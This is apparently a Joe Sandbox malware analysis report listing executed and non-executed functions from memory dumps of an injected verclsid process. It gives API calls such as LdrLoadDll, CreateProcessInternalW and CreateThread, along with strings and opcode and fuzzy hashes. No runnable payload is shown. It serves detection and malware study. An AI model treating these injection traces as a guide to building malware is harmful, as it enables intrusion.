                                                                                                                                              • Opcode ID: ae85dfac85697976508c4d45c07f18a8845c7b7fad6d5c80ce2b9ce9a9ce881e
                                                                                                                                              • Instruction ID: c925c5eda34f98ddabe8bd263161b700a29e64149c5fd8ef736cb3cb2723ffe0
                                                                                                                                              • Opcode Fuzzy Hash: ae85dfac85697976508c4d45c07f18a8845c7b7fad6d5c80ce2b9ce9a9ce881e
                                                                                                                                              • Instruction Fuzzy Hash: E190023164590452F1007158851470610058BD0245FA5C411A04255ACD8795DA5275A3
                                                                                                                                              Function 04EF39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: be0de266ac900cbf5c0506191400fcde0123b745d9ca849b7729b5c5e2468f0b
                                                                                                                                              • Instruction ID: f2fb301fab24e4cd2db8a28ea307cd92aa673c30037baa73437b196ea0471688
                                                                                                                                              • Opcode Fuzzy Hash: be0de266ac900cbf5c0506191400fcde0123b745d9ca849b7729b5c5e2468f0b
                                                                                                                                              • Instruction Fuzzy Hash: FF90022128585152F150715C84046164005ABE0245F95C021A08155D8D8555D9567222
                                                                                                                                              Function 02EC3970 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02EC3A4B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Sleep
                                                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                                                              • Opcode ID: 9a982c9f92adcd95448ecc57050193e0ce496d01f72d8e1bfca04b68ca75cdc3
                                                                                                                                              • Instruction ID: f0e6f26a49a1190ba3cdaddc226f9c1785760babb58ea4029979fe622dc0d87e
                                                                                                                                              • Opcode Fuzzy Hash: 9a982c9f92adcd95448ecc57050193e0ce496d01f72d8e1bfca04b68ca75cdc3
                                                                                                                                              • Instruction Fuzzy Hash: 8D317CB1A40705BFDB14DFA4C980FEBB7B9BB88704F54D11DBA196B241C77066528BA0
                                                                                                                                              Function 02EBF38A Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                              • String ID: @J7<
                                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                                              • Opcode ID: 7fb710b7f9ddff437ef6c8691df8cba70606e27efa5328a0e8ba33f68e1eda6a
                                                                                                                                              • Instruction ID: a39ae2633749c09af03072d4b2464c1438d7377c51da5b4374c23c7f593d69ae
                                                                                                                                              • Opcode Fuzzy Hash: 7fb710b7f9ddff437ef6c8691df8cba70606e27efa5328a0e8ba33f68e1eda6a
                                                                                                                                              • Instruction Fuzzy Hash: 4F311EB5A1060A9FDB01DFD8DC809EFB7B9FF88308B108559E905EB214D775EA058BA0
                                                                                                                                              Function 02EBF390 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                              • String ID: @J7<
                                                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                                                              • Opcode ID: 371225e84779fb8ea188eb84d52aa009cffab7ad630d3fcb975dfdd3332cdab9
                                                                                                                                              • Instruction ID: 704a7947ca78832d32595c937926675e4e49c3d7105a7514167cd0323a90b6df
                                                                                                                                              • Opcode Fuzzy Hash: 371225e84779fb8ea188eb84d52aa009cffab7ad630d3fcb975dfdd3332cdab9
                                                                                                                                              • Instruction Fuzzy Hash: 1D3101B5A006099FDB01DFD8DC809EFB7B9BF88304B108559E915A7214D775EE458BA0
                                                                                                                                              Function 02EB43A3 Relevance: 1.6, APIs: 1, Instructions: 51libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4422
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Load
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                              • Opcode ID: 82554ed2c03de7997a4d315825c940acf26f8e4c6a04597bb5d2ae5ef93d38e8
                                                                                                                                              • Instruction ID: 5f512dc8e1c0ee729a89e378f65630e1cc754eb0383fc1481b98fd4cf8016acb
                                                                                                                                              • Opcode Fuzzy Hash: 82554ed2c03de7997a4d315825c940acf26f8e4c6a04597bb5d2ae5ef93d38e8
                                                                                                                                              • Instruction Fuzzy Hash: 35016D759440069BDB16CF94E490FFDB761DF4120CF18E199E8498B283EB33D61AC710
                                                                                                                                              Function 02EB43B0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4422
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Load
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                              • Opcode ID: 00d942c87c948fc33bf6d0a28c3962f0214707d7afd975e894d95002740caacb
                                                                                                                                              • Instruction ID: 0b4090c55ebe77e4eaef5bca84b2cf35dc8f86d05da06d0bf9dec3cbaf21be76
                                                                                                                                              • Opcode Fuzzy Hash: 00d942c87c948fc33bf6d0a28c3962f0214707d7afd975e894d95002740caacb
                                                                                                                                              • Instruction Fuzzy Hash: B40152B5D4010DABDB10EBE4ED41FDEB3789F44308F1091A9E90897281F631E7158B51
                                                                                                                                              Function 02EC9690 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,1953F364,?,02EB817E,00000010,?,?,?,00000044,?,00000010,02EB817E,?,1953F364,?), ref: 02EC96F0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateInternalProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2186235152-0
                                                                                                                                              • Opcode ID: 28259ab4ed211497795ff25faa75a94e4f7199c064b5e76912f477d51da4844d
                                                                                                                                              • Instruction ID: 1af7cd64a0bb63ddcb1d328ceeac01f143247a39d2658249ab196f815cb8356f
                                                                                                                                              • Opcode Fuzzy Hash: 28259ab4ed211497795ff25faa75a94e4f7199c064b5e76912f477d51da4844d
                                                                                                                                              • Instruction Fuzzy Hash: 960180B6214508BBCB54DE99DC80EEB77AEAF8C754F519118BA09E7240D630F8518BA4
                                                                                                                                              Function 02EB4430 Relevance: 1.5, APIs: 1, Instructions: 46libraryloaderCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02EB4422
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Load
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2234796835-0
                                                                                                                                              • Opcode ID: 5685f2ffee13ede49d7528cc2ac4854ecf7ab164cfeca43d5e13da8bac0efa39
                                                                                                                                              • Instruction ID: d53b64ede52324102ca795362412fd43457ada78206d45c042df31e3499c9a2b
                                                                                                                                              • Opcode Fuzzy Hash: 5685f2ffee13ede49d7528cc2ac4854ecf7ab164cfeca43d5e13da8bac0efa39
                                                                                                                                              • Instruction Fuzzy Hash: CBF0F97854814DBFCB01CEA4CC81FDB7F7CEF81604F004185F84897282DA20AE15CBA1
                                                                                                                                              Function 02EA9D90 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EA9DD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                              • Opcode ID: c9a6f9969203894520f9e7f79af79585e196d52a4bc6dc5d2c86fc2ac51f69f6
                                                                                                                                              • Instruction ID: e1ffb1844b693114178055f60096e97d48c77ee79e8140447253ffa015ff46df
                                                                                                                                              • Opcode Fuzzy Hash: c9a6f9969203894520f9e7f79af79585e196d52a4bc6dc5d2c86fc2ac51f69f6
                                                                                                                                              • Instruction Fuzzy Hash: 8BF065333C02143AE62071E99C02FD7768CDB81765F245026F74CEF1C1D991B44146E5
                                                                                                                                              Function 02EA9D8C Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02EA9DD5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                              • Opcode ID: c88389901b808e230b101c5d700a7b7f6be757a2abd3c389cccf5dcafdba6cfc
                                                                                                                                              • Instruction ID: 8d94d8a876abbcd84877f61d6518a374c54881342f194fb19b094d2023a129b9
                                                                                                                                              • Opcode Fuzzy Hash: c88389901b808e230b101c5d700a7b7f6be757a2abd3c389cccf5dcafdba6cfc
                                                                                                                                              • Instruction Fuzzy Hash: D9E06D732802103AE62062A98D02FCB66999B84754F259119F74CAF1C0D9A1B4418BE8
                                                                                                                                              Function 02EC9600 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0C4789C2,00000007,00000000,00000004,00000000,02EB3C99,000000F4), ref: 02EC963F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                              • Opcode ID: 2efa40702ec438919dbcbf8a09229c89a54f78e9ae01cd40ee2cd257bef1d35a
                                                                                                                                              • Instruction ID: 7fea899ae7373fd927f4063145822971a77b57fb7439585fa58f5db3edd32b3b
                                                                                                                                              • Opcode Fuzzy Hash: 2efa40702ec438919dbcbf8a09229c89a54f78e9ae01cd40ee2cd257bef1d35a
                                                                                                                                              • Instruction Fuzzy Hash: C9E065722002187FD614EF98DC40FDB3BADEFC8720F008418F908AB240CA70B9118BB8
                                                                                                                                              Function 02EC95B0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(02EB18D9,?,02EC569B,02EB18D9,02EC557F,02EC569B,?,02EB18D9,02EC557F,00001000,?,?,00000000), ref: 02EC95EF
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                              • Opcode ID: 69b36e2bb53b4d2a233f19849c185f78b1fb4443a14ec6e8ad9b56a6bb8e90f7
                                                                                                                                              • Instruction ID: 9d5b7afb17d909fedf7fa530a9e46f8e7751f2b68348437317f8a87facd256d7
                                                                                                                                              • Opcode Fuzzy Hash: 69b36e2bb53b4d2a233f19849c185f78b1fb4443a14ec6e8ad9b56a6bb8e90f7
                                                                                                                                              • Instruction Fuzzy Hash: ACE065766002087FC610EE98DC40F9B37ADEFC9714F008019FA09AB240C670B9108AB4
                                                                                                                                              Function 02EB81C0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02EB81EC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 06e3061b5d87af9c7aec2b9d8bc7a7690c510e4ebd446628f65a5972b3f61520
                                                                                                                                              • Instruction ID: 996d6f6e6e46fb7fad57699e61ae2ce459e78678a2532716787a71bb3fde51d0
                                                                                                                                              • Opcode Fuzzy Hash: 06e3061b5d87af9c7aec2b9d8bc7a7690c510e4ebd446628f65a5972b3f61520
                                                                                                                                              • Instruction Fuzzy Hash: 3DE0487128020416FA24E6A8DD45BA6335DAF48728F589560B99C9F2D1D678E9014264
                                                                                                                                              Function 02EB7FB0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02EB1BE0,02EC7EBF,02EC557F,02EB1BA3), ref: 02EB7FE3
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorMode
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2340568224-0
                                                                                                                                              • Opcode ID: 5b0e5c6d656aa72be7dc31278e5c9346eb8684f39efc5980ba060c0cb0786f6f
                                                                                                                                              • Instruction ID: 8ac894758645c1572b78ccddaf4944def44e85bdeaeaff623ebdbf75c92fefdb
                                                                                                                                              • Opcode Fuzzy Hash: 5b0e5c6d656aa72be7dc31278e5c9346eb8684f39efc5980ba060c0cb0786f6f
                                                                                                                                              • Instruction Fuzzy Hash: EED05E762C03043BFA00ABE6DD07F96368D9B40794F04D068BA4CDB2C2ED66F0004AB6
                                                                                                                                              Function 02EB0CAB Relevance: 1.5, APIs: 1, Instructions: 20threadwindowCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 02EB0CBD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3905958604.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_2ea0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessagePostThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1836367815-0
                                                                                                                                              • Opcode ID: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                                                              • Instruction ID: 0a062e2f4d171d57a71f2baef708d6a9acfe46067aba05904719e416cf64cd49
                                                                                                                                              • Opcode Fuzzy Hash: 8ec3775f0e40b3bee5156ff5a0e22553932c57dfa4200919125e76a782e4c981
                                                                                                                                              • Instruction Fuzzy Hash: 3DD0A732B8020C30EA2241549C42FFF776C8F41A01F104167FB00F40C1D780640A0AA5
                                                                                                                                              Function 04EF2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                              • Opcode ID: 7c43972a00ee8e2aab03735b645a53fcf8feb93fabffa4266da31aac16c6857d
                                                                                                                                              • Instruction ID: 7b225fcfc8013df6d54ea94b6aa8293b52ba48e47ad75f0c320b49d413c2ec32
                                                                                                                                              • Opcode Fuzzy Hash: 7c43972a00ee8e2aab03735b645a53fcf8feb93fabffa4266da31aac16c6857d
                                                                                                                                              • Instruction Fuzzy Hash: 5CB09B719419C5D5FB11F7604A087177900ABD0745F55C0A1D3030685E4739D1D1F176

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 04DA04E8 Relevance: .1, Instructions: 146COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907110994.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4da0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bbd38b3352da47cb41d2584d81bc4623b4c5e17e81afff79eb1583829d8e6cca
                                                                                                                                              • Instruction ID: aa7651e131fefffc03b144674a00a6c247295c5536dc86ad9b36833abfb530c2
                                                                                                                                              • Opcode Fuzzy Hash: bbd38b3352da47cb41d2584d81bc4623b4c5e17e81afff79eb1583829d8e6cca
                                                                                                                                              • Instruction Fuzzy Hash: 9641F570619B0D4FD368EF68908567BB3E2FB89304F504A2DD99BC3252EB70F8568785
                                                                                                                                              Function 04DADE49 Relevance: 56.5, Strings: 45, Instructions: 214COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907110994.0000000004DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DA0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4da0000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                              • API String ID: 0-3558027158
                                                                                                                                              • Opcode ID: 1aada6beaf99acc0db891d6b4cd902237b78069c5366aa77022e5bf2b14a1565
                                                                                                                                              • Instruction ID: 01d00538b163ea791f940d6b858fa18d91577730cd3f18c0ba99d7fd7d9dfa58
                                                                                                                                              • Opcode Fuzzy Hash: 1aada6beaf99acc0db891d6b4cd902237b78069c5366aa77022e5bf2b14a1565
                                                                                                                                              • Instruction Fuzzy Hash: F39161F04482948AC7158F58A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                                                                                                                              Function 04EF2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                              • Opcode ID: da38cb85bf851146fc16e000744eaeedc37d3df844b83fd7017c9d5e4b5c7b82
                                                                                                                                              • Instruction ID: d460b1c87ee3049d94376092888179ae8fb0f8d29b6fbf5c27f032b2ac08c665
                                                                                                                                              • Opcode Fuzzy Hash: da38cb85bf851146fc16e000744eaeedc37d3df844b83fd7017c9d5e4b5c7b82
                                                                                                                                              • Instruction Fuzzy Hash: AC5106B2E00156BFDB10DF988D8097FF7B8BB4820475091A9E669D7641E735FE019BA0
                                                                                                                                              Function 04F62410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                              • API String ID: 48624451-2108815105
                                                                                                                                              • Opcode ID: ebb3c8bc260f5c8741837cfdaa46f115bfde3d0c0681fcafb4895e64cef53667
                                                                                                                                              • Instruction ID: b7a64cdb5db9b716520dab2892d6a8951206854e1ba9abb1cce3afa07e6c9a7b
                                                                                                                                              • Opcode Fuzzy Hash: ebb3c8bc260f5c8741837cfdaa46f115bfde3d0c0681fcafb4895e64cef53667
                                                                                                                                              • Instruction Fuzzy Hash: 07510371A00645AFDB30EF9CCC9097FBBF9AF44204B018499E8D6D7681EA74FE419B60
                                                                                                                                              Function 04EE7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04F246FC
                                                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04F24655
                                                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04F24787
                                                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04F24742
                                                                                                                                              • ExecuteOptions, xrefs: 04F246A0
                                                                                                                                              • Execute=1, xrefs: 04F24713
                                                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04F24725
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000007.00000002.3907181367.0000000004E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E80000, based on PE: true
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.0000000004FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000007.00000002.3907181367.000000000501E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_7_2_4e80000_verclsid.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                              • API String ID: 0-484625025
                                                                                                                                              • Opcode ID: 29e944daf123d4b7fabdbb07d0e98133b2b0bf53c661d2d0b9748a94f7f56c22
                                                                                                                                              • Instruction ID: 2351af678322f55eb743f5a56fdfae6c7a31edaeaf4efa029ed65ae9005cdb1b
                                                                                                                                              • Opcode Fuzzy Hash: 29e944daf123d4b7fabdbb07d0e98133b2b0bf53c661d2d0b9748a94f7f56c22
                                                                                                                                              • Instruction Fuzzy Hash: AA51F871A0021AAAFF14EFA5DC95FFA77A8EF04309F0414A9D505AB1D0E771BE468F50
